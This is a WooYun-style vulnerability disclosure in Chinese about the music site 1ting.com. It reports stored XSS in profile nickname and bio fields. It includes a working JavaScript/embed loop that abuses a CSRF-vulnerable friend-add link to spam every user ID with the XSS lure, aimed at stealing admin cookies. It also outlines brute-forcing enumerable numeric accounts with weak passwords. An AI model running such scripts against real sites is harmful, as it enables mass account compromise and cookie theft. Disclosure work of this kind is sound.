WooYun.org

1. 注册后，xss存在于个人昵称和简介处。
个人昵称的长度可手工突破，直接在控制台给个人昵称赋值。
注册tmxkorg的账号测试：

我的主页效果：http://my.1ting.com/site/5852576
2. 因为留言是审核的不宜传播蠕虫。发现有站内信。
我又注册了帐号hucexe做测试，我用tmxk.org帐号加hucexe为好友。
加好友连接为http://my.1ting.com/friend/action/add?id=账户id，我用hucexe账户登录，发现收到被加好友消息，点击，结果弹出了tmxkorg帐号测试的xss。

因为加别人为好友，不需要对方同意，而且操作以连接的形式完成(csrf的良好条件)，于是写个本地js

<embed id="rc">
<div id="xx">
<script>
var i=0;
function f()
{
setTimeout("f()",100);
i++;
document.getElementById("xx").innerHTML=i;
document.getElementById("rc").src="http://my.1ting.com/friend/action/add?id="+i;
}
f();
</script>

这样每隔100ms加一个好友，也就是向那个id发一条信息。很快我的好友如麻：

1ting有700万注册用户，如果我全部加好友，先不说服务器能给我的账号存这些数据不，理想点击率千分之一，也有7000人点击。我想，管理肯定会点。cookies自然来了。这个没想到去破坏1ting的业务，如果再深入，就可以劫持首页，音乐播放自然完成不了。
3. 登录处没加验证码，只是帐号密码，因为帐号是数字可穷举，配合php脚本可得到所有用户名，如果用弱口令集匹配这些用户，我想会有不少人落网，这个可以做实验，但因为实验结果大概知道，就不写这样的脚本了。